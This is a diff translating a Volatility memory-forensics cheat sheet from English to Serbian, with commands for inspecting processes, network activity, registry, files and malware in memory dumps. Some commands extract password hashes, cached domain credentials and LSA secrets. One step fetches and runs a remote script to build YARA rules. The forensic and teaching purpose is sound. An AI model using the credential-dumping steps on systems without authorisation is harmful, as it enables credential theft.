pslist. +To čini “list” pluginove prilično brzim, ali jednako ranjivim na manipulaciju od strane malvera kao i Windows API. Na primer, ako malver koristi DKOM da unlinkuje proces iz `_EPROCESS` povezane liste, on se neće prikazati u Task Manager-u, niti u pslist-u. -“scan” plugins, on the other hand, will take an approach similar to carving the memory for things that might make sense when dereferenced as specific structures. `psscan` for instance will read the memory and try to make`_EPROCESS` objects out of it (it uses pool-tag scanning, which is searching for 4-byte strings that indicate the presence of a structure of interest). 
The advantage is that it can dig up processes that have exited, and even if malware tampers with the `_EPROCESS` linked list, the plugin will still find the structure lying around in memory (since it still needs to exist for the process to run). The downfall is that “scan” plugins are a bit slower than “list” plugins, and can sometimes yield false positives (a process that exited too long ago and had parts of its structure overwritten by other operations). +“scan” pluginovi, s druge strane, će uzeti pristup sličan vađenju podataka iz memorije za stvari koje bi mogle imati smisla kada se dereferenciraju kao specifične strukture. `psscan` na primer će čitati memoriju i pokušati da napravi `_EPROCESS` objekte iz nje (koristi skeniranje pool-tagova, što je pretraživanje za 4-bajtne stringove koji ukazuju na prisustvo strukture od interesa). Prednost je u tome što može pronaći procese koji su izašli, i čak i ako malver manipuliše `_EPROCESS` povezanim listama, plugin će i dalje pronaći strukturu koja leži u memoriji (pošto ona i dalje mora postojati da bi proces radio). Nedostatak je što su “scan” pluginovi malo sporiji od “list” pluginova, i ponekad mogu dati lažne pozitivne rezultate (proces koji je izašao previše davno i čiji su delovi strukture prepisani drugim operacijama). 
-From: [http://tomchop.me/2016/11/21/tutorial-volatility-plugins-malware-analysis/](http://tomchop.me/2016/11/21/tutorial-volatility-plugins-malware-analysis/) +Iz: [http://tomchop.me/2016/11/21/tutorial-volatility-plugins-malware-analysis/](http://tomchop.me/2016/11/21/tutorial-volatility-plugins-malware-analysis/) -## OS Profiles +## OS profili ### Volatility3 -As explained inside the readme you need to put the **symbol table of the OS** you want to support inside _volatility3/volatility/symbols_.\ -Symbol table packs for the various operating systems are available for **download** at: +Kao što je objašnjeno u readme-u, potrebno je staviti **tabelu simbola OS-a** koji želite da podržite unutar _volatility3/volatility/symbols_.\ +Paketi tabela simbola za različite operativne sisteme su dostupni za **preuzimanje** na: - [https://downloads.volatilityfoundation.org/volatility3/symbols/windows.zip](https://downloads.volatilityfoundation.org/volatility3/symbols/windows.zip) - [https://downloads.volatilityfoundation.org/volatility3/symbols/mac.zip](https://downloads.volatilityfoundation.org/volatility3/symbols/mac.zip) 
@@ -89,16 +75,13 @@ Symbol table packs for the various operating systems are available for **downloa ### Volatility2 -#### External Profile - -You can get the list of supported profiles doing: +#### Spoljni profil +Možete dobiti listu podržanih profila tako što ćete uraditi: ```bash ./volatility_2.6_lin64_standalone --info | grep "Profile" ``` - -If you want to use a **new profile you have downloaded** (for example a linux one) you need to create somewhere the following folder structure: _plugins/overlays/linux_ and put inside this folder the zip file containing the profile. Then, get the number of the profiles using: - +Ako želite da koristite **novi profil koji ste preuzeli** (na primer, linux profil), potrebno je da negde kreirate sledeću strukturu foldera: _plugins/overlays/linux_ i stavite unutar ovog foldera zip fajl koji sadrži profil. Zatim, dobijte broj profila koristeći: ```bash ./vol --plugins=/home/kali/Desktop/ctfs/final/plugins --info Volatility Foundation Volatility Framework 2.6 
@@ -110,28 +93,22 @@ LinuxCentOS7_3_10_0-123_el7_x86_64_profilex64 - A Profile for Linux CentOS7_3.10 VistaSP0x64 - A Profile for Windows Vista SP0 x64 VistaSP0x86 - A Profile for Windows Vista SP0 x86 ``` +Možete **preuzeti Linux i Mac profile** sa [https://github.com/volatilityfoundation/profiles](https://github.com/volatilityfoundation/profiles) -You can **download Linux and Mac profiles** from [https://github.com/volatilityfoundation/profiles](https://github.com/volatilityfoundation/profiles) - -In the previous chunk you can see that the profile is called `LinuxCentOS7_3_10_0-123_el7_x86_64_profilex64`, and you can use it to execute something like: - +U prethodnom delu možete videti da se profil zove `LinuxCentOS7_3_10_0-123_el7_x86_64_profilex64`, i možete ga koristiti za izvršavanje nečega poput: ```bash ./vol -f file.dmp --plugins=. --profile=LinuxCentOS7_3_10_0-123_el7_x86_64_profilex64 linux_netscan ``` - -#### Discover Profile - +#### Otkrijte profil ``` volatility imageinfo -f file.dmp volatility kdbgscan -f file.dmp ``` +#### **Razlike između imageinfo i kdbgscan** -#### **Differences between imageinfo and kdbgscan** - -[**From here**](https://www.andreafortuna.org/2017/06/25/volatility-my-own-cheatsheet-part-1-image-identification/): As opposed to imageinfo which simply provides profile suggestions, **kdbgscan** is designed to positively identify the correct profile and the correct KDBG address (if there happen to be multiple). This plugin scans for the KDBGHeader signatures linked to Volatility profiles and applies sanity checks to reduce false positives. The verbosity of the output and the number of sanity checks that can be performed depends on whether Volatility can find a DTB, so if you already know the correct profile (or if you have a profile suggestion from imageinfo), then make sure you use it from . - -Always take a look at the **number of processes that kdbgscan has found**. 
Sometimes imageinfo and kdbgscan can find **more than one** suitable **profile** but only the **valid one will have some process related** (This is because to extract processes the correct KDBG address is needed) +[**Odavde**](https://www.andreafortuna.org/2017/06/25/volatility-my-own-cheatsheet-part-1-image-identification/): Za razliku od imageinfo koji jednostavno pruža predloge profila, **kdbgscan** je dizajniran da pozitivno identifikuje tačan profil i tačnu KDBG adresu (ako ih ima više). Ovaj plugin skenira KDBGHeader potpise povezane sa Volatility profilima i primenjuje provere ispravnosti kako bi smanjio lažne pozitivne rezultate. Opširnost izlaza i broj provera ispravnosti koje se mogu izvršiti zavise od toga da li Volatility može pronaći DTB, tako da ako već znate tačan profil (ili ako imate predlog profila iz imageinfo), obavezno ga koristite. +Uvek obratite pažnju na **broj procesa koje je kdbgscan pronašao**. Ponekad imageinfo i kdbgscan mogu pronaći **više od jednog** odgovarajućeg **profila**, ali samo **važeći će imati neki povezani proces** (To je zato što je za ekstrakciju procesa potrebna tačna KDBG adresa). ```bash # GOOD PsActiveProcessHead : 0xfffff800011977f0 (37 processes) 
@@ -143,89 +120,68 @@ PsLoadedModuleList : 0xfffff8000119aae0 (116 modules) PsActiveProcessHead : 0xfffff800011947f0 (0 processes) PsLoadedModuleList : 0xfffff80001197ac0 (0 modules) ``` - #### KDBG -The **kernel debugger block**, referred to as **KDBG** by Volatility, is crucial for forensic tasks performed by Volatility and various debuggers. Identified as `KdDebuggerDataBlock` and of the type `_KDDEBUGGER_DATA64`, it contains essential references like `PsActiveProcessHead`. This specific reference points to the head of the process list, enabling the listing of all processes, which is fundamental for thorough memory analysis. +**Kernel debugger block**, poznat kao **KDBG** u Volatility, je ključan za forenzičke zadatke koje obavlja Volatility i razni debageri. Identifikovan kao `KdDebuggerDataBlock` i tipa `_KDDEBUGGER_DATA64`, sadrži bitne reference kao što je `PsActiveProcessHead`. Ova specifična referenca ukazuje na početak liste procesa, omogućavajući prikazivanje svih procesa, što je osnovno za temeljnu analizu memorije. ## OS Information - ```bash #vol3 has a plugin to give OS information (note that imageinfo from vol2 will give you OS info) ./vol.py -f file.dmp windows.info.Info ``` +Plugin `banners.Banners` može se koristiti u **vol3 da pokuša da pronađe linux banere** u dump-u. -The plugin `banners.Banners` can be used in **vol3 to try to find linux banners** in the dump. +## Hashovi/Lozinke -## Hashes/Passwords - -Extract SAM hashes, [domain cached credentials](../../../windows-hardening/stealing-credentials/credentials-protections.md#cached-credentials) and [lsa secrets](../../../windows-hardening/authentication-credentials-uac-and-efs/#lsa-secrets). +Izvucite SAM hashove, [keširane kredencijale domena](../../../windows-hardening/stealing-credentials/credentials-protections.md#cached-credentials) i [lsa tajne](../../../windows-hardening/authentication-credentials-uac-and-efs/#lsa-secrets). 
{{#tabs}} {{#tab name="vol3"}} - ```bash ./vol.py -f file.dmp windows.hashdump.Hashdump #Grab common windows hashes (SAM+SYSTEM) ./vol.py -f file.dmp windows.cachedump.Cachedump #Grab domain cache hashes inside the registry ./vol.py -f file.dmp windows.lsadump.Lsadump #Grab lsa secrets ``` - {{#endtab}} {{#tab name="vol2"}} - ```bash volatility --profile=Win7SP1x86_23418 hashdump -f file.dmp #Grab common windows hashes (SAM+SYSTEM) volatility --profile=Win7SP1x86_23418 cachedump -f file.dmp #Grab domain cache hashes inside the registry volatility --profile=Win7SP1x86_23418 lsadump -f file.dmp #Grab lsa secrets ``` - {{#endtab}} {{#endtabs}} ## Memory Dump -The memory dump of a process will **extract everything** of the current status of the process. The **procdump** module will only **extract** the **code**. - +Memory dump procesa će **izvući sve** iz trenutnog stanja procesa. **procdump** modul će samo **izvući** **kod**. ``` volatility -f file.dmp --profile=Win7SP1x86 memdump -p 2168 -D conhost/ ``` +## Procesi -​ +### Lista procesa -
- -​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - -## Processes - -### List processes - -Try to find **suspicious** processes (by name) or **unexpected** child **processes** (for example a cmd.exe as a child of iexplorer.exe).\ -It could be interesting to **compare** the result of pslist with the one of psscan to identify hidden processes. +Pokušajte da pronađete **sumnjive** procese (po imenu) ili **neočekivane** dečje **procese** (na primer, cmd.exe kao dečiji proces iexplorer.exe).\ +Može biti zanimljivo da se **uporedi** rezultat pslist-a sa onim iz psscan-a kako bi se identifikovali skriveni procesi. {{#tabs}} {{#tab name="vol3"}} - ```bash python3 vol.py -f file.dmp windows.pstree.PsTree # Get processes tree (not hidden) python3 vol.py -f file.dmp windows.pslist.PsList # Get process list (EPROCESS) python3 vol.py -f file.dmp windows.psscan.PsScan # Get hidden process list(malware) ``` - {{#endtab}} {{#tab name="vol2"}} - ```bash volatility --profile=PROFILE pstree -f file.dmp # Get process tree (not hidden) volatility --profile=PROFILE pslist -f file.dmp # Get process list (EPROCESS) volatility --profile=PROFILE psscan -f file.dmp # Get hidden process list(malware) volatility --profile=PROFILE psxview -f file.dmp # Get hidden process list ``` - {{#endtab}} {{#endtabs}} 
@@ -233,144 +189,120 @@ volatility --profile=PROFILE psxview -f file.dmp # Get hidden process list {{#tabs}} {{#tab name="vol3"}} - ```bash ./vol.py -f file.dmp windows.dumpfiles.DumpFiles --pid #Dump the .exe and dlls of the process in the current directory ``` - {{#endtab}} {{#tab name="vol2"}} - ```bash volatility --profile=Win7SP1x86_23418 procdump --pid=3152 -n --dump-dir=. -f file.dmp ``` - {{#endtab}} {{#endtabs}} -### Command line +### Komandna linija -Anything suspicious was executed? +Da li je izvršeno nešto sumnjivo? {{#tabs}} {{#tab name="vol3"}} - ```bash python3 vol.py -f file.dmp windows.cmdline.CmdLine #Display process command-line arguments ``` - {{#endtab}} {{#tab name="vol2"}} - ```bash volatility --profile=PROFILE cmdline -f file.dmp #Display process command-line arguments volatility --profile=PROFILE consoles -f file.dmp #command history by scanning for _CONSOLE_INFORMATION ``` - {{#endtab}} {{#endtabs}} -Commands executed in `cmd.exe` are managed by **`conhost.exe`** (or `csrss.exe` on systems before Windows 7). This means that if **`cmd.exe`** is terminated by an attacker before a memory dump is obtained, it's still possible to recover the session's command history from the memory of **`conhost.exe`**. To do this, if unusual activity is detected within the console's modules, the memory of the associated **`conhost.exe`** process should be dumped. Then, by searching for **strings** within this dump, command lines used in the session can potentially be extracted. +Komande izvršene u `cmd.exe` upravlja **`conhost.exe`** (ili `csrss.exe` na sistemima pre Windows 7). To znači da, ako **`cmd.exe`** bude prekinut od strane napadača pre nego što se dobije memorijski dump, još uvek je moguće povratiti istoriju komandi sesije iz memorije **`conhost.exe`**. Da bi se to uradilo, ako se otkrije neobična aktivnost unutar modula konzole, memorija povezanog **`conhost.exe`** procesa treba da se dumpuje. 
Zatim, pretraživanjem **stringova** unutar ovog dumpa, mogu se potencijalno izvući komandne linije korišćene u sesiji. -### Environment +### Okruženje -Get the env variables of each running process. There could be some interesting values. +Dobijte env varijable svakog pokrenutog procesa. Mogu postojati neki zanimljivi vrednosti. {{#tabs}} {{#tab name="vol3"}} - ```bash python3 vol.py -f file.dmp windows.envars.Envars [--pid ] #Display process environment variables ``` - {{#endtab}} {{#tab name="vol2"}} - ```bash volatility --profile=PROFILE envars -f file.dmp [--pid ] #Display process environment variables volatility --profile=PROFILE -f file.dmp linux_psenv [-p ] #Get env of process. runlevel var means the runlevel where the proc is initated ``` - {{#endtab}} {{#endtabs}} -### Token privileges +### Token privilegije -Check for privileges tokens in unexpected services.\ -It could be interesting to list the processes using some privileged token. +Proverite privilegovane tokene u neočekivanim servisima.\ +Može biti zanimljivo napraviti spisak procesa koji koriste neki privilegovani token. 
{{#tabs}} {{#tab name="vol3"}} - ```bash #Get enabled privileges of some processes python3 vol.py -f file.dmp windows.privileges.Privs [--pid ] #Get all processes with interesting privileges python3 vol.py -f file.dmp windows.privileges.Privs | grep "SeImpersonatePrivilege\|SeAssignPrimaryPrivilege\|SeTcbPrivilege\|SeBackupPrivilege\|SeRestorePrivilege\|SeCreateTokenPrivilege\|SeLoadDriverPrivilege\|SeTakeOwnershipPrivilege\|SeDebugPrivilege" ``` - {{#endtab}} {{#tab name="vol2"}} - ```bash #Get enabled privileges of some processes volatility --profile=Win7SP1x86_23418 privs --pid=3152 -f file.dmp | grep Enabled #Get all processes with interesting privileges volatility --profile=Win7SP1x86_23418 privs -f file.dmp | grep "SeImpersonatePrivilege\|SeAssignPrimaryPrivilege\|SeTcbPrivilege\|SeBackupPrivilege\|SeRestorePrivilege\|SeCreateTokenPrivilege\|SeLoadDriverPrivilege\|SeTakeOwnershipPrivilege\|SeDebugPrivilege" ``` - {{#endtab}} {{#endtabs}} ### SIDs -Check each SSID owned by a process.\ -It could be interesting to list the processes using a privileges SID (and the processes using some service SID). +Proverite svaki SSID koji poseduje proces.\ +Može biti zanimljivo navesti procese koji koriste SID sa privilegijama (i procese koji koriste neki servisni SID). {{#tabs}} {{#tab name="vol3"}} - ```bash ./vol.py -f file.dmp windows.getsids.GetSIDs [--pid ] #Get SIDs of processes ./vol.py -f file.dmp windows.getservicesids.GetServiceSIDs #Get the SID of services ``` - {{#endtab}} {{#tab name="vol2"}} - ```bash volatility --profile=Win7SP1x86_23418 getsids -f file.dmp #Get the SID owned by each process volatility --profile=Win7SP1x86_23418 getservicesids -f file.dmp #Get the SID of each service ``` - {{#endtab}} {{#endtabs}} ### Handles -Useful to know to which other files, keys, threads, processes... a **process has a handle** for (has opened) +Koristan je znati na koje druge datoteke, ključeve, niti, procese... 
**proces ima handle** (otvorene su) {{#tabs}} {{#tab name="vol3"}} - ```bash vol.py -f file.dmp windows.handles.Handles [--pid ] ``` - {{#endtab}} {{#tab name="vol2"}} - ```bash volatility --profile=Win7SP1x86_23418 -f file.dmp handles [--pid=] ``` - {{#endtab}} {{#endtabs}} @@ -378,40 +310,33 @@ volatility --profile=Win7SP1x86_23418 -f file.dmp handles [--pid=] {{#tabs}} {{#tab name="vol3"}} - ```bash ./vol.py -f file.dmp windows.dlllist.DllList [--pid ] #List dlls used by each ./vol.py -f file.dmp windows.dumpfiles.DumpFiles --pid #Dump the .exe and dlls of the process in the current directory process ``` - {{#endtab}} {{#tab name="vol2"}} - ```bash volatility --profile=Win7SP1x86_23418 dlllist --pid=3152 -f file.dmp #Get dlls of a proc volatility --profile=Win7SP1x86_23418 dlldump --pid=3152 --dump-dir=. -f file.dmp #Dump dlls of a proc ``` - {{#endtab}} {{#endtabs}} -### Strings per processes +### Stringovi po procesima -Volatility allows us to check which process a string belongs to. +Volatility nam omogućava da proverimo kojem procesu pripada string. {{#tabs}} {{#tab name="vol3"}} - ```bash strings file.dmp > /tmp/strings.txt ./vol.py -f /tmp/file.dmp windows.strings.Strings --strings-file /tmp/strings.txt ``` - {{#endtab}} {{#tab name="vol2"}} - ```bash strings file.dmp > /tmp/strings.txt volatility -f /tmp/file.dmp windows.strings.Strings --string-file /tmp/strings.txt 
@@ -419,99 +344,78 @@ volatility -f /tmp/file.dmp windows.strings.Strings --string-file /tmp/strings.t volatility -f /tmp/file.dmp --profile=Win81U1x64 memdump -p 3532 --dump-dir . strings 3532.dmp > strings_file ``` - {{#endtab}} {{#endtabs}} -It also allows to search for strings inside a process using the yarascan module: +Takođe omogućava pretragu stringova unutar procesa koristeći yarascan modul: {{#tabs}} {{#tab name="vol3"}} - ```bash ./vol.py -f file.dmp windows.vadyarascan.VadYaraScan --yara-rules "https://" --pid 3692 3840 3976 3312 3084 2784 ./vol.py -f file.dmp yarascan.YaraScan --yara-rules "https://" ``` - {{#endtab}} {{#tab name="vol2"}} - ```bash volatility --profile=Win7SP1x86_23418 yarascan -Y "https://" -p 3692,3840,3976,3312,3084,2784 ``` - {{#endtab}} {{#endtabs}} ### UserAssist -**Windows** keeps track of programs you run using a feature in the registry called **UserAssist keys**. These keys record how many times each program is executed and when it was last run. +**Windows** prati programe koje pokrećete koristeći funkciju u registru nazvanu **UserAssist ključevi**. Ovi ključevi beleže koliko puta je svaki program pokrenut i kada je poslednji put pokrenut. {{#tabs}} {{#tab name="vol3"}} - ```bash ./vol.py -f file.dmp windows.registry.userassist.UserAssist ``` - {{#endtab}} {{#tab name="vol2"}} - ``` volatility --profile=Win7SP1x86_23418 -f file.dmp userassist ``` - {{#endtab}} {{#endtabs}} ​ -
-​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - -## Services +## Usluge {{#tabs}} {{#tab name="vol3"}} - ```bash ./vol.py -f file.dmp windows.svcscan.SvcScan #List services ./vol.py -f file.dmp windows.getservicesids.GetServiceSIDs #Get the SID of services ``` - {{#endtab}} {{#tab name="vol2"}} - ```bash #Get services and binary path volatility --profile=Win7SP1x86_23418 svcscan -f file.dmp #Get name of the services and SID (slow) volatility --profile=Win7SP1x86_23418 getservicesids -f file.dmp ``` - {{#endtab}} {{#endtabs}} -## Network +## Mreža {{#tabs}} {{#tab name="vol3"}} - ```bash ./vol.py -f file.dmp windows.netscan.NetScan #For network info of linux use volatility2 ``` - {{#endtab}} {{#tab name="vol2"}} - ```bash volatility --profile=Win7SP1x86_23418 netscan -f file.dmp volatility --profile=Win7SP1x86_23418 connections -f file.dmp#XP and 2003 only 
@@ -526,102 +430,84 @@ volatility --profile=SomeLinux -f file.dmp linux_arp #ARP table volatility --profile=SomeLinux -f file.dmp linux_list_raw #Processes using promiscuous raw sockets (comm between processes) volatility --profile=SomeLinux -f file.dmp linux_route_cache ``` - {{#endtab}} {{#endtabs}} ## Registry hive -### Print available hives +### Ispis dostupnih hives {{#tabs}} {{#tab name="vol3"}} - ```bash ./vol.py -f file.dmp windows.registry.hivelist.HiveList #List roots ./vol.py -f file.dmp windows.registry.printkey.PrintKey #List roots and get initial subkeys ``` - {{#endtab}} {{#tab name="vol2"}} - ```bash volatility --profile=Win7SP1x86_23418 -f file.dmp hivelist #List roots volatility --profile=Win7SP1x86_23418 -f file.dmp printkey #List roots and get initial subkeys ``` - {{#endtab}} {{#endtabs}} -### Get a value +### Dobijanje vrednosti {{#tabs}} {{#tab name="vol3"}} - ```bash ./vol.py -f file.dmp windows.registry.printkey.PrintKey --key "Software\Microsoft\Windows NT\CurrentVersion" ``` - {{#endtab}} {{#tab name="vol2"}} - ```bash volatility --profile=Win7SP1x86_23418 printkey -K "Software\Microsoft\Windows NT\CurrentVersion" -f file.dmp # Get Run binaries registry value volatility -f file.dmp --profile=Win7SP1x86 printkey -o 0x9670e9d0 -K 'Software\Microsoft\Windows\CurrentVersion\Run' ``` - {{#endtab}} {{#endtabs}} ### Dump - ```bash #Dump a hive volatility --profile=Win7SP1x86_23418 hivedump -o 0x9aad6148 -f file.dmp #Offset extracted by hivelist #Dump all hives volatility --profile=Win7SP1x86_23418 hivedump -f file.dmp ``` +## Datotečni sistem -## Filesystem - -### Mount +### Montiranje {{#tabs}} {{#tab name="vol3"}} - ```bash #See vol2 ``` - {{#endtab}} {{#tab name="vol2"}} - ```bash volatility --profile=SomeLinux -f file.dmp linux_mount volatility --profile=SomeLinux -f file.dmp linux_recover_filesystem #Dump the entire filesystem (if possible) ``` - {{#endtab}} {{#endtabs}} -### Scan/dump +### Skener/izbacivanje {{#tabs}} {{#tab name="vol3"}} 
- ```bash ./vol.py -f file.dmp windows.filescan.FileScan #Scan for files inside the dump ./vol.py -f file.dmp windows.dumpfiles.DumpFiles --physaddr <0xAAAAA> #Offset from previous command ``` - {{#endtab}} {{#tab name="vol2"}} - ```bash volatility --profile=Win7SP1x86_23418 filescan -f file.dmp #Scan for files inside the dump volatility --profile=Win7SP1x86_23418 dumpfiles -n --dump-dir=/tmp -f file.dmp #Dump all files 
@@ -631,60 +517,44 @@ volatility --profile=SomeLinux -f file.dmp linux_enumerate_files volatility --profile=SomeLinux -f file.dmp linux_find_file -F /path/to/file volatility --profile=SomeLinux -f file.dmp linux_find_file -i 0xINODENUMBER -O /path/to/dump/file ``` - {{#endtab}} {{#endtabs}} ### Master File Table - -{{#tabs}} -{{#tab name="vol3"}} - ```bash # I couldn't find any plugin to extract this information in volatility3 ``` - {{#endtab}} {{#tab name="vol2"}} - ```bash volatility --profile=Win7SP1x86_23418 mftparser -f file.dmp ``` - {{#endtab}} {{#endtabs}} -The **NTFS file system** uses a critical component known as the _master file table_ (MFT). This table includes at least one entry for every file on a volume, covering the MFT itself too. Vital details about each file, such as **size, timestamps, permissions, and actual data**, are encapsulated within the MFT entries or in areas external to the MFT but referenced by these entries. More details can be found in the [official documentation](https://docs.microsoft.com/en-us/windows/win32/fileio/master-file-table). +**NTFS datotečni sistem** koristi kritičnu komponentu poznatu kao _master file table_ (MFT). Ova tabela uključuje barem jedan unos za svaku datoteku na volumenu, pokrivajući i samu MFT. Vitalni detalji o svakoj datoteci, kao što su **veličina, vremenske oznake, dozvole i stvarni podaci**, su enkapsulirani unutar MFT unosa ili u oblastima van MFT, ali na koje se pozivaju ovi unosi. Više detalja može se naći u [official documentation](https://docs.microsoft.com/en-us/windows/win32/fileio/master-file-table). 
-### SSL Keys/Certs +### SSL Ključevi/Cerifikati {{#tabs}} {{#tab name="vol3"}} - ```bash #vol3 allows to search for certificates inside the registry ./vol.py -f file.dmp windows.registry.certificates.Certificates ``` - {{#endtab}} {{#tab name="vol2"}} - ```bash #vol2 allos you to search and dump certificates from memory #Interesting options for this modules are: --pid, --name, --ssl volatility --profile=Win7SP1x86_23418 dumpcerts --dump-dir=. -f file.dmp ``` - {{#endtab}} {{#endtabs}} ## Malware - -{{#tabs}} -{{#tab name="vol3"}} - ```bash ./vol.py -f file.dmp windows.malfind.Malfind [--dump] #Find hidden and injected code, [dump each suspicious section] #Malfind will search for suspicious structures related to malware @@ -698,11 +568,9 @@ volatility --profile=Win7SP1x86_23418 dumpcerts --dump-dir=. -f file.dmp ./vol.py -f file.dmp linux.check_modules.Check_modules #Compares module list to sysfs info, if available ./vol.py -f file.dmp linux.tty_check.tty_check #Checks tty devices for hooks ``` - {{#endtab}} {{#tab name="vol2"}} - ```bash volatility --profile=Win7SP1x86_23418 -f file.dmp malfind [-D /tmp] #Find hidden and injected code [dump each suspicious section] volatility --profile=Win7SP1x86_23418 -f file.dmp apihooks #Detect API hooks in process and kernel memory 
@@ -718,18 +586,16 @@ volatility --profile=SomeLinux -f file.dmp linux_check_modules volatility --profile=SomeLinux -f file.dmp linux_check_tty volatility --profile=SomeLinux -f file.dmp linux_keyboard_notifiers #Keyloggers ``` - {{#endtab}} {{#endtabs}} -### Scanning with yara +### Skener sa yara -Use this script to download and merge all the yara malware rules from github: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\ -Create the _**rules**_ directory and execute it. This will create a file called _**malware_rules.yar**_ which contains all the yara rules for malware. +Koristite ovaj skript za preuzimanje i spajanje svih yara pravila za malver sa github-a: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\ +Kreirajte _**rules**_ direktorijum i izvršite ga. Ovo će kreirati datoteku pod nazivom _**malware_rules.yar**_ koja sadrži sva yara pravila za malver. {{#tabs}} {{#tab name="vol3"}} - ```bash wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py mkdir rules 
@@ -739,191 +605,149 @@ python malware_yara_rules.py #All ./vol.py -f file.dmp yarascan.YaraScan --yara-file /tmp/malware_rules.yar ``` - {{#endtab}} {{#tab name="vol2"}} - ```bash wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py mkdir rules python malware_yara_rules.py volatility --profile=Win7SP1x86_23418 yarascan -y malware_rules.yar -f ch2.dmp | grep "Rule:" | grep -v "Str_Win32" | sort | uniq ``` - {{#endtab}} {{#endtabs}} ## MISC -### External plugins +### Eksterni dodaci -If you want to use external plugins make sure that the folders related to the plugins are the first parameter used. +Ako želite da koristite eksterne dodatke, uverite se da su fascikle povezane sa dodacima prvi parametar koji se koristi. {{#tabs}} {{#tab name="vol3"}} - ```bash ./vol.py --plugin-dirs "/tmp/plugins/" [...] ``` - {{#endtab}} {{#tab name="vol2"}} - ```bash - volatilitye --plugins="/tmp/plugins/" [...] +volatilitye --plugins="/tmp/plugins/" [...] 
``` - {{#endtab}} {{#endtabs}} #### Autoruns -Download it from [https://github.com/tomchop/volatility-autoruns](https://github.com/tomchop/volatility-autoruns) - +Preuzmite ga sa [https://github.com/tomchop/volatility-autoruns](https://github.com/tomchop/volatility-autoruns) ``` - volatility --plugins=volatility-autoruns/ --profile=WinXPSP2x86 -f file.dmp autoruns +volatility --plugins=volatility-autoruns/ --profile=WinXPSP2x86 -f file.dmp autoruns ``` - ### Mutexes {{#tabs}} {{#tab name="vol3"}} - ``` ./vol.py -f file.dmp windows.mutantscan.MutantScan ``` - {{#endtab}} {{#tab name="vol2"}} - ```bash volatility --profile=Win7SP1x86_23418 mutantscan -f file.dmp volatility --profile=Win7SP1x86_23418 -f file.dmp handles -p -t mutant ``` - {{#endtab}} {{#endtabs}} -### Symlinks - -{{#tabs}} -{{#tab name="vol3"}} - +### Simboličke veze ```bash ./vol.py -f file.dmp windows.symlinkscan.SymlinkScan ``` - {{#endtab}} {{#tab name="vol2"}} - ```bash volatility --profile=Win7SP1x86_23418 -f file.dmp symlinkscan ``` - {{#endtab}} {{#endtabs}} ### Bash -It's possible to **read from memory the bash history.** You could also dump the _.bash_history_ file, but it was disabled you will be glad you can use this volatility module +Moguće je **pročitati bash istoriju iz memorije.** Takođe možete izvući _.bash_history_ fajl, ali je on onemogućen, bićete srećni što možete koristiti ovaj volatility modul {{#tabs}} {{#tab name="vol3"}} - ``` ./vol.py -f file.dmp linux.bash.Bash ``` - {{#endtab}} {{#tab name="vol2"}} - ``` volatility --profile=Win7SP1x86_23418 -f file.dmp linux_bash ``` - {{#endtab}} {{#endtabs}} -### TimeLine +### Vremenska Linija {{#tabs}} {{#tab name="vol3"}} - ```bash ./vol.py -f file.dmp timeLiner.TimeLiner ``` - {{#endtab}} {{#tab name="vol2"}} - ``` volatility --profile=Win7SP1x86_23418 -f timeliner ``` - {{#endtab}} {{#endtabs}} -### Drivers +### Drajveri {{#tabs}} {{#tab name="vol3"}} - ``` ./vol.py -f file.dmp windows.driverscan.DriverScan ``` - {{#endtab}} {{#tab 
name="vol2"}} - ```bash volatility --profile=Win7SP1x86_23418 -f file.dmp driverscan ``` - {{#endtab}} {{#endtabs}} -### Get clipboard - +### Uzmi sadržaj iz međuspremnika ```bash #Just vol2 volatility --profile=Win7SP1x86_23418 clipboard -f file.dmp ``` - -### Get IE history - +### Dobijanje IE istorije ```bash #Just vol2 volatility --profile=Win7SP1x86_23418 iehistory -f file.dmp ``` - -### Get notepad text - +### Dobijanje teksta iz notepada ```bash #Just vol2 volatility --profile=Win7SP1x86_23418 notepad -f file.dmp ``` - ### Screenshot - ```bash #Just vol2 volatility --profile=Win7SP1x86_23418 screenshot -f file.dmp ``` - ### Master Boot Record (MBR) - ```bash volatility --profile=Win7SP1x86_23418 mbrparser -f file.dmp ``` - -The **Master Boot Record (MBR)** plays a crucial role in managing the logical partitions of a storage medium, which are structured with different [file systems](https://en.wikipedia.org/wiki/File_system). It not only holds partition layout information but also contains executable code acting as a boot loader. This boot loader either directly initiates the OS's second-stage loading process (see [second-stage boot loader](https://en.wikipedia.org/wiki/Second-stage_boot_loader)) or works in harmony with the [volume boot record](https://en.wikipedia.org/wiki/Volume_boot_record) (VBR) of each partition. For in-depth knowledge, refer to the [MBR Wikipedia page](https://en.wikipedia.org/wiki/Master_boot_record). +**Master Boot Record (MBR)** igra ključnu ulogu u upravljanju logičkim particijama skladišnog medija, koje su strukturirane sa različitim [file systems](https://en.wikipedia.org/wiki/File_system). On ne samo da sadrži informacije o rasporedu particija, već takođe sadrži izvršni kod koji deluje kao boot loader. 
